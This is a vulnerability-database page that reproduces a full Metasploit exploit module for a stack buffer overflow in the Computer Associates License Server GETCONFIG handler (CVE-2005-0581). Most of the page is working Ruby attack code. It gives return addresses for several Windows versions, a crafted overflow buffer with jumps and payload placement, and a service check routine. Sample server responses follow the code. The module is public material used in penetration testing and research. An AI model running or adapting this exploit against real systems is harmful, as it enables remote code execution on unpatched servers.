Vulners
Lucene search
Computer Associates License Server - GETCONFIG Overflow (Metasploit)
| Reporter | Title | Published | Views | Family All 38 |
|---|---|---|---|---|
 | CA License Service Multiple Vulnerabilities | 10 Mar 200500:00 | – | nessus |
| CA License Service Multiple Vulnerabilities | 10 Mar 200500:00 | – | nessus |
 | CVE-2005-0581 | 2 May 200504:00 | – | attackerkb |
 | Immunity Canvas: CA_LIC | 2 May 200504:00 | – | canvas |
 | CVE-2005-0581 | 20 Sep 201000:00 | – | circl |
 | CA License Software GETCONFIG Buffer Overflow (CVE-2005-0581) | 26 Oct 200900:00 | – | checkpoint_advisories |
| CA License Software GCR Buffer Overflow (CVE-2005-0581) | 16 Nov 200900:00 | – | checkpoint_advisories |
| CA License Software Invalid Command Buffer Overflow (CVE-2005-0581) | 18 Nov 200900:00 | – | checkpoint_advisories |
 | CVE-2005-0581 | 2 Mar 200505:00 | – | cve |
 | CVE-2005-0581 | 2 Mar 200505:00 | – | cvelist |
10
##
# $Id: calicserv_getconfig.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Computer Associates License Server GETCONFIG Overflow',
'Description' => %q{
This module exploits an vulnerability in the CA License Server
network service. By sending an excessively long GETCONFIG
packet the stack may be overwritten.
},
'Author' =>
[
'Thor Doomen <syscall [at] hushmail.com>', # original msf v2 module
'patrick', # msf v3 port :)
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10394 $',
'References' =>
[
[ 'CVE', '2005-0581' ],
[ 'OSVDB', '14389' ],
[ 'BID', '12705' ],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# As much as I would like to return back to the DLL or EXE,
# all of those modules have a leading NULL in the
# loaded @ address :(
# name, jmp esi, writable, jmp edi
#['Automatic', {} ],
#
# patrickw - tested OK Windows XP English SP0-1 only 20100214
['Windows 2000 English', { 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi
['Windows XP English SP0-1', { 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi
['Windows XP English SP2', { 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi
['Windows 2003 English SP0', { 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi
],
'DisclosureDate' => 'Mar 02 2005'))
register_options(
[
Opt::RPORT(10202),
], self.class)
end
def check
connect
banner = sock.get_once
sock.put("A0 GETCONFIG SELF 0<EOM>")
res = sock.get_once
disconnect
if (res =~ /OS\<([^\>]+)/)
print_status("CA License Server reports OS: #{$1}")
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
connect
banner = sock.get_once
if (banner !~ /GETCONFIG/)
print_status("The server did not return the expected greeting!")
end
# exploits two different versions at once >:-)
# 144 -> return address of esi points to string middle
# 196 -> return address of edi points to string beginning
# 148 -> avoid exception by patching with writable address
# 928 -> seh handler (not useful under XP SP2)
buff = rand_text_alphanumeric(900)
buff[142, 2] = Rex::Arch::X86.jmp_short(8) # jmp over addresses
buff[144, 4] = [target['Rets'][0]].pack('V') # jmp esi
buff[148, 4] = [target['Rets'][1]].pack('V') # writable address
buff[194, 2] = Rex::Arch::X86.jmp_short(4) # jmp over address
buff[196, 4] = [target['Rets'][2]].pack('V') # jmp edi
buff[272, payload.encoded.length] = payload.encoded
sploit = "A0 GETCONFIG SELF #{buff}<EOM>"
sock.put(sploit)
handler
disconnect
end
end
=begin
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
=endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Sep 2010 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 24.6
EPSS0.71247